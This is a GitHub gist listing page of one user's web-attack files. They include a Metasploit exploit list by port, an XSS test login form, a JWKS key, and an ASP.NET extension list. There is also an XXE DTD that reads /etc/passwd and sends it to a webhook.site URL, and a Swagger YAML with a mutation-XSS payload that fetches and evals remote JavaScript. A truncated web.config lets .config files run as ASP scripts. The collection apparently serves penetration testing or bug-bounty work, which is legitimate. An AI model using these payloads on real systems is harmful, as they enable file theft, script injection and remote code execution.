ajdumanhug
/ metasploit_exploits_by_rport.txt
Created
October 20, 2017 07:38
Find metasploit exploits by their default RPORT port
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| exploit/osx/mdns/upnp_location: RPORT 0 | |
| exploit/windows/dcerpc/ms07_029_msdns_zonename: RPORT 0 | |
| exploit/windows/scada/igss9_misc: RPORT 0 | |
| exploit/windows/firewall/blackice_pam_icq: RPORT 1 | |
| exploit/windows/http/altn_webadmin: RPORT 1000 | |
| exploit/unix/webapp/webmin_show_cgi_exec: RPORT 10000 | |
| exploit/windows/backupexec/remote_agent: RPORT 10000 | |
| exploit/windows/oracle/osb_ndmp_auth: RPORT 10000 | |
| exploit/multi/misc/zend_java_bridge: RPORT 10001 | |
| exploit/windows/misc/gimp_script_fu: RPORT 10008 |
ajdumanhug
/ xss-poc.svg
Created
December 14, 2023 08:47
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <div class="login"> | |
| <div class="form"> | |
| <h2>NOT WORKING YET!</h2> | |
| <h3>Login</h3> | |
| <input type="text" placeholder="Username"> | |
| <input type="password" placeholder="Password"> | |
| <input type="submit" value="Sign In" class="submit"> | |
| </div> | |
| </div> |
ajdumanhug
/ jwks.json
Last active
September 20, 2023 18:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "keys": [ | |
| { | |
| "alg": "RS256", | |
| "x5c": [ | |
| "MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqrgOv9Czows21TmZA8UJ+B2VG4oDtCYBQ3s1y6V6v4gCAA4tnLtrQc4sUqsiJ4X78UBEV7eVnOYXgb4kuzVhuurzifI/ky6A0TekoaANxTyNLx0RucpzT23iyyix6NKCUD9o5jg7K0Lt8tBi8hOl7VomFpBcxPPI7S5BzewJS+QCJj3QQB8cgC047HRUEaJKRcPb5VPcNleGjc7caZUqtbVZETfp0OsIdPuUa0s6c8ZIrTfDrdG74HYlX8BY5rsJT39nSpFO/cDjHm2jgXbVbvmRzZ/hkasxO0q+uTKqPZVfa30leHzvCn1heuVgut9WlCxNrtjR3lmr8HKis3b5tvdUZNCyBv4OgJ0dxrBpa4SVDjnfjzCTx6krqkyRs5meOOZ5FntKT7Q700q49U/04mskamce244TbN2sP4ino26Mjfn175pq1VDU5gh+4yelfYzCUFiz+5xOqpmoAZn3xI4WzvrWwZCiLXQGTgKhwpskfKTMQ5k8ytWCR80wU1epDIYMbFGTauIVLouiQPC1xDTJA7sq/sC2Zf44+qCctO0Kc2gh77em5QmT/a7cG7D4Ct76dzTmy+04mKEMM+K1AFZGzt4GlvaRlGZ5zWsWzHw8oIimQP1Ua90aHU/uotbKLcxTzQZQ/WqXnUWgmi6LtxcCq2B+kDB380liDMt2nFkCAwEAAQ==" | |
| ] | |
| } | |
| ] | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| asax | |
| ascv | |
| ashx | |
| asmx | |
| aspx | |
| axd | |
| browser | |
| cd | |
| compile | |
| config |
ajdumanhug
/ xxe.dtd
Last active
February 1, 2023 17:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> | |
| <!ENTITY % xxe "<!ENTITY exfil SYSTEM 'https://webhook.site/1b43cfb3-3c7c-490e-b77c-37aa66ef9e3b/?data=%file;'>"> | |
| %xxe; |
ajdumanhug
/ test.json
Created
May 17, 2022 07:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml", | |
| "urls": [ | |
| { | |
| "url": "https://gist.githubusercontent.com/ajdumanhug/596672ed001e78288c8516c28aa6575f/raw/50e54cec13ea40f3115dcf45e60fbca531b1eb90/test.yaml", | |
| "name": "Foo" | |
| } | |
| ] | |
| } |
ajdumanhug
/ test.yaml
Last active
May 17, 2022 06:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: '2.0' | |
| info: | |
| title: Classic API Resource Documentation | |
| description: | | |
| <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=fetch('https://gist.githubusercontent.com/ajdumanhug/5026beb333226700c029b46324234e17/raw/357a217fb6499a2bce747e7d545fc84f3f77b921/xss.js').then(function(res){res.text().then(function(data){eval(data)})}) src=1>"></form> | |
| version: production | |
| basePath: /JSSResource/ | |
| produces: | |
| - application/xml |
ajdumanhug
/ xss.js
Created
May 17, 2022 06:42
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert(/XSS by AJ/); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <configuration> | |
| <system.webServer> | |
| <handlers accessPolicy="Read, Script, Write"> | |
| <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /> | |
| </handlers> | |
| <security> | |
| <requestFiltering> | |
| <fileExtensions> | |
| <remove fileExtension=".config" /> |
NewerOlder